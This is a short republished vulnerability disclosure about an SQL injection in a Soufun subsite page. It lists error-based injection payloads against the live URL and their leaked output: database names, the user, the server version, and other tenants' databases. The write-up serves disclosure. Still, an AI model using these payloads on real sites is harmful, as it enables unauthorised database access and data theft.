搜房网分站SQL注射漏洞导致多个数据库数据泄漏及修复


gz.soufun/popsite/meilin/shownewsen.asp?id=140

未对参数进行过滤导致数据和服务器信息泄漏等问题

应该还能进一步下去

漏洞证明:gz.soufun/popsite/meilin/shownewsen.asp?id=140

and db_name()>0 -> db:meilinjiye

and user>0 -> user:meilin

and 1=convert(int,@@version)-- ->version:Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

and 0 <> db_name(n)

0-> 'meilinjiye'

1-> 'master'

2-> 'tempdb'

3-> 'model'

4-> 'msdb'

5-> 'pubs'

6-> 'Northwind'

7-> 'njtlg'

8-> 'meilinjiye'

9-> 'chengkai'

10-> 'futongdb'

11-> 'shresource'

12-> 'sfb_xk'

13-> 'rjcpddb'

14-> 'szhouse'

15-> 'lingpeng'

16-> 'njyb'

17-> 'hongda'

18-> 'songdu'

19-> 'myhwk'

20-> 'cshouse'

24-> 'jufeng'

26-> 'vanke'

27-> 'zjnahc'

28-> 'qcfc'

29-> 'easeskyplaza'

30-> 'HuaRunXHJ'

33-> 'zjszfc'

40-> 'dyxfc'

45-> 'abbewa'

46-> 'gzpma'

47-> 'shangshuiyuan'

49-> 'WuHan_Hits'

...

修复方案:

过滤参数

作者Ambulong@乌云


上一篇:OSI传输层功能及协议

下一篇:好孩子育儿网多处注入及修复方案

Wcat.exe是什么文件?Wcat.exe是不是病毒 wd2_051117_WIS207_mini.exe是什么文件?wd2_051117_WIS207_mini winupd32.exe是什么文件?winupd32.exe是不是病毒 wc98pp.dll是什么文件?wc98pp.dll是不是病毒 wdm.exe是什么文件?wdm.exe是不是病毒 wget.exe是什么文件?wget.exe是不是病毒 wfwall1.exe是什么文件?wfwall1.exe是不是病毒 wincon.exe是什么文件?wincon.exe是不是病毒 winampb.exe是什么文件?winampb.exe是不是病毒 WatchClient.exe是什么文件?WatchClient.exe是不是病毒
Copyright © 2002-2019 测速网 www.inhv.cn 皖ICP备2023010105号
测速城市 测速地区 测速街道 网速测试城市 网速测试地区 网速测试街道
温馨提示:部分文章图片数据来源与网络,仅供参考!版权归原作者所有,如有侵权请联系删除!

热门搜索 城市网站建设 地区网站制作 街道网页设计 大写数字 热点城市 热点地区 热点街道 热点时间 房贷计算器